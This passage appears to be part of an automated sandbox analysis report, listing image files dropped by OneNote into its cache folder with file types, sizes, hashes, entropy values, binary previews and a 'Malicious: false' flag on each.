                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .t*e..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N....*..........#..M<|.2.Y.../QO.x.cTM4......+.F;V.x.de*....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007E.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2266
                                                                                                                                                                                                                  Entropy (8bit):5.563021222358941
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
                                                                                                                                                                                                                  MD5:DB8A181E3F0EAD4A9472099E42ED6BE3
                                                                                                                                                                                                                  SHA1:92096AF05CC6167B1AA816811A1160B809393FA2
                                                                                                                                                                                                                  SHA-256:E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
                                                                                                                                                                                                                  SHA-512:A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.|.....5h.y.%.~...G

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007G.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):99293
                                                                                                                                                                                                                  Entropy (8bit):7.9690121496708555
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
                                                                                                                                                                                                                  MD5:EA45266A770EEA27A24A5BB3BE688B14
                                                                                                                                                                                                                  SHA1:9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
                                                                                                                                                                                                                  SHA-256:EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
                                                                                                                                                                                                                  SHA-512:D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...-...c............sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R..*.<........6...m@..r..j2..HK"|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n...*......#..W.41...5.#.`..I...<.?.|..*+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3*..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007I.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2898
                                                                                                                                                                                                                  Entropy (8bit):7.551512280854713
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
                                                                                                                                                                                                                  MD5:7C7D9922101488124D2E4666709198AC
                                                                                                                                                                                                                  SHA1:00CC44A1B84D4D94A0ACE8834491EB5F65D04619
                                                                                                                                                                                                                  SHA-256:20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
                                                                                                                                                                                                                  SHA-512:882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................| F.. ...j*...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!*.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007K.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):29187
                                                                                                                                                                                                                  Entropy (8bit):7.971308326749753
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
                                                                                                                                                                                                                  MD5:DF99CAAAB9A7DE97B63343E60A699AB6
                                                                                                                                                                                                                  SHA1:B84334135CFB73BC6EF55F85926770D5AC6DFEA8
                                                                                                                                                                                                                  SHA-256:74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
                                                                                                                                                                                                                  SHA-512:5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;*.'.f.5^.....m..<$....8.R.j.D.v..>...*dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%.*.S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..|D...+...NA....Y.^f.1|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N.....*.U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007M.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4819
                                                                                                                                                                                                                  Entropy (8bit):7.874649683222419
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
                                                                                                                                                                                                                  MD5:5D6C1F361BC04403555BE945E28E53FC
                                                                                                                                                                                                                  SHA1:00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
                                                                                                                                                                                                                  SHA-256:131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
                                                                                                                                                                                                                  SHA-512:34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V.*..S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f*.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007O.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1717
                                                                                                                                                                                                                  Entropy (8bit):7.154087739587035
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
                                                                                                                                                                                                                  MD5:943371B39CA847674998535110462220
                                                                                                                                                                                                                  SHA1:5CA79B7BD7E0E93271463FAEF3280F1644CBA073
                                                                                                                                                                                                                  SHA-256:9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
                                                                                                                                                                                                                  SHA-512:812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J*....Q...b.Q..Ah....Ah..b.Ah..b.PZ*.(.@z.?.`;2.......................................................Q...b.Q..EZ*.(..Z>.G.....`Z+E......J*....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007Q.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3555
                                                                                                                                                                                                                  Entropy (8bit):7.686253071499049
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
                                                                                                                                                                                                                  MD5:8A5444524F467A45A5A10245F89C855A
                                                                                                                                                                                                                  SHA1:ACE68D567B02B68275E0345C86DB1139C0EC1386
                                                                                                                                                                                                                  SHA-256:7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
                                                                                                                                                                                                                  SHA-512:8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn*..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..|3.........................*Q..../c.....f.}8....D..|k..Z......0..~..c..e..m(...|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007S.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3428
                                                                                                                                                                                                                  Entropy (8bit):7.766473352510893
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
                                                                                                                                                                                                                  MD5:EE9E2DF458733B61333E8A82F7A2613D
                                                                                                                                                                                                                  SHA1:A86704C969F51B86D6A05ED51C6C60214ED9FA89
                                                                                                                                                                                                                  SHA-256:BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
                                                                                                                                                                                                                  SHA-512:BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z*...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v...*.q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007U.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65589
                                                                                                                                                                                                                  Entropy (8bit):7.960181939300061
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
                                                                                                                                                                                                                  MD5:8B48DA9F89264D14B83FF9969F869577
                                                                                                                                                                                                                  SHA1:E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
                                                                                                                                                                                                                  SHA-256:62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
                                                                                                                                                                                                                  SHA-512:03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......{.....;Za.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... |...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S*..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}*.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^.*..$F..{G...8.#....8'..&....8..5.....3(P._....S......|".....u.cr....+a-....&V..x...iI-<|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.A*c^.......*..D..uL=.}.#*0.. M!.A.C......|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000080.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1873
                                                                                                                                                                                                                  Entropy (8bit):7.534961703340853
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
                                                                                                                                                                                                                  MD5:4FC8500BD304AD127AF4B5E269DFF59B
                                                                                                                                                                                                                  SHA1:9A5E3432358A0FCDECE86AEB967319B93A65D14A
                                                                                                                                                                                                                  SHA-256:B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
                                                                                                                                                                                                                  SHA-512:E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O..*...5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F].........*.:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000082.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5465
                                                                                                                                                                                                                  Entropy (8bit):7.79401348966645
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
                                                                                                                                                                                                                  MD5:8470F9A96B6C6CAD9EE60961E96D19B2
                                                                                                                                                                                                                  SHA1:AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
                                                                                                                                                                                                                  SHA-256:2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
                                                                                                                                                                                                                  SHA-512:CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w|.H..*.K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.|f/..+\ID.r/.o........0i..*.G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?*...I....M.0<.u....!..C..U.T.....s.Q......_..7K..*.....?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000083.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3361
                                                                                                                                                                                                                  Entropy (8bit):7.619405839796034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
                                                                                                                                                                                                                  MD5:A994063FF2ABEB78917C5382B2F5FA8C
                                                                                                                                                                                                                  SHA1:BD5C4D816B04A2B6596DFE38DB01228F553FACCC
                                                                                                                                                                                                                  SHA-256:D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
                                                                                                                                                                                                                  SHA-512:CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
                                                                                                                                                                                                                  Malicious:false
